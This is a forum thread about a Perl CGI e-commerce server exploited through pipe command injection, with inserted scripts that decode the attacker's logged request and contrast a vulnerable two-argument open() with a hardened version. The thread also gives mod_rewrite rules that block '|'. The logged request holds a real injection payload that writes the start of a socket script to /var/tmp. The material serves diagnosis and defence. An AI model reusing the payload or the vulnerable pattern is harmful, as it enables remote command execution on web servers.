Perl being hacked

Hello,

I'm having a problem with one customer's server: someone found a way to make Perl run scripts on that server, and I do not know if that's a Perl bug or if there is something I can disable to make it stop... Here is the line from the log file:

65.7.178.227 - - [15/Apr/2006:03:33:53 -0400] "GET /cgi-bin/master.cgi?page=|perl%20-e%20%22print%20%5C%22%5C043%5C041%5C057%5C165%5C163%5C162%5C057%5C142%5C151%5C156%5C057%5C160%5C145%5C162%5C154%5C012%5C165%5C163%5C145%5C040%5C123%5C157%5C143%5C153%5C145%5C164%5C073%5C040%5C165%5C163%5C145%5C040%5C111%5C117%5C072%5C072%5C110%5C141%5C156%5C144%5C154%5C145%5C073%5C040%5C165%5C163%5C145%5C040%5C120%5C117%5C123%5C111%5C130%5C073%5C040%5C044%5C160%5C162%5C157%5C164%5C157%5C040%5C075%5C040%5C147%5C145%5C164%5C160%5C162%5C157%5C164%5C157%5C142%5C171%5C156%5C141%5C155%5C145%5C050%5C047%5C164%5C143%5C160%5C047%5C051%5C073%5C%22%22%20%3E/var/tmp/.mixed.2006| HTTP/1.1" 200 5

The file .mixed.2006 was there when I looked.

Thank you in advance
adcentrixAsked:
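What the logged request actually does can be read off the line above once the URL encoding is undone. The following is an added example, not part of the original post: it parses the quoted log line, URL-decodes the `page` parameter, flags the leading/trailing `|` that turns a two-argument Perl `open()` into a command execution, and decodes the `\NNN` octal escapes the `perl -e` one-liner prints. The decoded output shows the attacker writing `#!/usr/bin/perl` followed by `use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp');` into `/var/tmp/.mixed.2006`, the opening lines of a socket-based Perl script; this log line carries only that first chunk. The function names are mine and the only input is the log line itself, embedded as a string.

```perl
#!/usr/bin/perl
# Added example, not code from the thread: decode the logged request so the
# injected command and the file it drops can be read. The only input is the
# log line quoted in the post, embedded here verbatim as a string.
use strict;
use warnings;

my $log_line = '65.7.178.227 - - [15/Apr/2006:03:33:53 -0400] "GET /cgi-bin/master.cgi?page=|perl%20-e%20%22print%20%5C%22%5C043%5C041%5C057%5C165%5C163%5C162%5C057%5C142%5C151%5C156%5C057%5C160%5C145%5C162%5C154%5C012%5C165%5C163%5C145%5C040%5C123%5C157%5C143%5C153%5C145%5C164%5C073%5C040%5C165%5C163%5C145%5C040%5C111%5C117%5C072%5C072%5C110%5C141%5C156%5C144%5C154%5C145%5C073%5C040%5C165%5C163%5C145%5C040%5C120%5C117%5C123%5C111%5C130%5C073%5C040%5C044%5C160%5C162%5C157%5C164%5C157%5C040%5C075%5C040%5C147%5C145%5C164%5C160%5C162%5C157%5C164%5C157%5C142%5C171%5C156%5C141%5C155%5C145%5C050%5C047%5C164%5C143%5C160%5C047%5C051%5C073%5C%22%22%20%3E/var/tmp/.mixed.2006| HTTP/1.1" 200 5';

# Reverse the %XX encoding the attacker used to get spaces, quotes and
# backslashes through the URL.
sub url_decode {
    my ($s) = @_;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# Pull the request target out of a common/combined-format log line and split
# it into the script path and the decoded query parameters.
sub parse_request {
    my ($line) = @_;
    my ($target) = $line =~ /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/ or return;
    my ($path, $query) = split /\?/, $target, 2;
    $query = '' unless defined $query;
    my %params;
    for my $pair (split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        $v = '' unless defined $v;
        $params{ url_decode($k) } = url_decode($v);
    }
    return ($path, \%params);
}

# Two-argument open() runs a command when the string begins or ends with '|'
# (whitespace around the pipe is ignored, as open() ignores it), so a value
# with a leading or trailing pipe is the signature of this attack.
sub has_pipe_injection {
    my ($value) = @_;
    return ($value =~ /\A\s*\|/ || $value =~ /\|\s*\z/) ? 1 : 0;
}

# The dropped script is hidden as \NNN octal escapes inside a double-quoted
# Perl string; undo that the way perl -e "print ..." would.
sub decode_octal_escapes {
    my ($s) = @_;
    $s =~ s/\\([0-7]{1,3})/chr oct $1/ge;
    return $s;
}

my ($path, $params) = parse_request($log_line);
my $page = $params->{page};
print "script:        $path\n";
print "page param:    $page\n";
print "pipe injected: ", (has_pipe_injection($page) ? 'yes' : 'no'), "\n";
if ($page =~ />\s*([^|\s]+)/) {          # shell redirection target
    print "written to:    $1\n";
}
if ($page =~ /print \\"(.*?)\\"/) {      # body of the perl -e print statement
    print "dropped file begins:\n", decode_octal_escapes($1), "\n";
}
```

Running this against the one line prints the script path, the decoded parameter, `pipe injected: yes`, `written to: /var/tmp/.mixed.2006`, and the two decoded lines of the dropped file. The same `has_pipe_injection` check, run over a whole access log, is a quick way to find every request that used the trick, whichever CGI it targeted.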
 
m1tk4Commented:
RewriteRule (.*)\|(.*) / [forbidden,qsappend]

Sorry, missed that one. Before you try it, try just requesting something like /blabla|.htm to see if you placed it in the right container.

By default RewriteRule doesn't parse the query strings.

Again, you still should fix your software, because mod_rewrite only lets you control GET requests, but POST requests may still circumvent this.
 
m1tk4Commented:
This is a vulnerability in "master.cgi"; Perl by itself has nothing to do with it. Apparently, master.cgi does not do the necessary checks for the safety of passed parameters, and a request like this one makes it do something it's not supposed to do.

To make it stop you need to either disable or fix "master.cgi", your Perl is fine.

Unfortunately, I can't help you more without knowing what that master.cgi does.
 
pjedmondCommented:
This vulnerability could have been around for ages!:

http://seclists.org/lists/vuln-dev/2001/Jun/0006.html

June 2001?

It looks as if it is part of a link exchange system:

http://www.scriptgateway.com/scripts/cgiandperl/link_checking/s307492-link_master_v4_0.html

that is no longer supported.

Solution - get rid of the master.cgi script!

HTH:)
 
adcentrixAuthor Commented:
Thanks for the response, but this is happening with all the scripts on the server, it's not just this one... It's part of an e-commerce software that we developed in Perl... It's running on another server without a problem...

I looked in the log, and the impostor is able to run any command that the user NOBODY is able to run if connected to the console... just by adding a pipe | at the end of the script, and after that the command that is supposed to be run by the server...

Thanks
 
adcentrixAuthor Commented:
Is there some type of command or instruction that I should add to the script to make it more secure? I only have the Perl location line, and after that I start with my own code. Is that correct, or should it have something else?
 
adcentrixAuthor Commented:
Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?
 
m1tk4Commented:
>> Is there sometype of command or instruction that I should add to the script to make it more secure? I only have the perl location line and after that I start with my own code? is that correct or it should have something else?

I don't quite understand what you mean by "perl location line".

Your vulnerability is in your e-commerce software code, and it is similar to this one: http://www.kb.cert.org/vuls/id/496064, http://sans.org/resources/malwarefaq/guestbook.php (they provide ways to fix it too). If it happens to all your scripts on the server, they all have the same problem. Even if you did something on the other server to protect yourself from this (and you can do it by doing a URL rewrite detecting the presence of | characters in the request), your real problem is your code in the e-commerce suite you are talking about, and you still need to fix it.
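The bug class m1tk4 is pointing at is a CGI parameter reaching Perl's two-argument `open()`, which treats a leading or trailing `|` in the string as "run this as a command". The script below is an added example, not the thread's master.cgi or the author's e-commerce code: it shows the vulnerable form next to a hardened one (allow-list validation of the parameter, a path built by the script rather than the client, and three-argument `open()` with a fixed read mode), and exercises both with a harmless stand-in for the logged payload. The pages directory, the `index.html` file and the function names are assumptions made for the demo.

```perl
#!/usr/bin/perl
# Added example, not code from the thread's master.cgi or the author's
# e-commerce suite. The pages directory and file names are made up for the
# demo. In a real CGI the first line would be "#!/usr/bin/perl -T": taint
# mode makes open() refuse any path derived from user input that has not
# been untainted by a regex capture, which is what safe_page() does.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Stand-in for the directory the CGI reads its page templates from.
my $pages_dir = tempdir(CLEANUP => 1);

# VULNERABLE: two-argument open() inspects the string. A trailing '|' means
# "run this as a command and read its output", so
#   ?page=|perl -e "..." >/var/tmp/.mixed.2006|
# turns into  sh -c '/pages/dir/|perl -e "..." >/var/tmp/.mixed.2006'
# executed as the web server user. (A leading '|' with nothing in front of
# it would instead pipe *to* the command; the attacker sends both.)
sub vulnerable_page {
    my ($page) = @_;
    open(my $fh, "$pages_dir/$page") or return;
    local $/;                       # slurp the whole file (or command output)
    my $body = <$fh>;
    close $fh;
    return $body;
}

# HARDENED: accept only a short allow-listed token (the capture also untaints
# it under -T), build the path here rather than from the client, and use
# three-argument open() with an explicit '<' so '|' in the name is only a byte.
sub safe_page {
    my ($page) = @_;
    return unless defined $page && $page =~ /\A([A-Za-z0-9_-]{1,32})\z/;
    my $path = File::Spec->catfile($pages_dir, "$1.html");
    open(my $fh, '<', $path) or return;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed demo input with the same shape as the logged attack, but the
# injected command is a harmless echo. The first "command" in the resulting
# shell pipeline is the directory path, which sh rejects on stderr (as it
# did in the real attack); the second command runs normally.
my $attack = '|echo INJECTED|';

# A legitimate page so the hardened version has something to serve.
open(my $out, '>', "$pages_dir/index.html") or die "cannot write demo page: $!";
print $out "<h1>Welcome</h1>\n";
close $out;

my $v = vulnerable_page($attack);
print "vulnerable_page:  ", defined $v ? $v : "(open failed)\n";   # INJECTED
my $s = safe_page($attack);
print "safe_page:        ", defined $s ? $s : "(rejected)\n";      # rejected
print "safe_page(index): ", safe_page('index');                    # serves the file
```

The validation regex is deliberately an allow-list rather than a search for `|`: stripping one metacharacter leaves the others (`;`, backticks, `>`, NUL) for the next attacker, whereas accepting only `[A-Za-z0-9_-]` and appending a fixed extension leaves nothing for the shell or the filesystem to interpret.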
 
m1tk4Commented:
>>Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?

If it's Apache, you can use mod_rewrite to detect and block that - see http://httpd.apache.org/docs/2.0/misc/rewriteguide.html
 
adcentrixAuthor Commented:
It's Apache version 1.3.33, and the script has the open function in it...

That's nice, but do you know how to use this command, and where should I add it in httpd.conf?

is this correct?
RedirectMatch ^|$ http://www.google.com/

Thank you very much for your help...
 

 
m1tk4Commented:
No, something like this:

RewriteRule (.*)\|(.*) / [forbidden]

| is a special character in regexp and needs to be escaped.
 
m1tk4Commented:
You can add it pretty much anywhere, .htaccess, <VirtualHost> container, <Directory> - it all depends on how your web server configuration is structured. Don't forget to add RewriteEngine on before it. See http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewriterule for detailed info on all rewrites.
 
adcentrixAuthor Commented:
I tried adding it to the .htaccess and the <Directory> container, but it does not affect the problem... it still accepts the command and does not forward to the forbidden page.

Any suggestion?
 
adcentrixAuthor Commented:
Thank you very much m1tk4
It worked, I also fixed the problem on our software...

Have a nice weekend...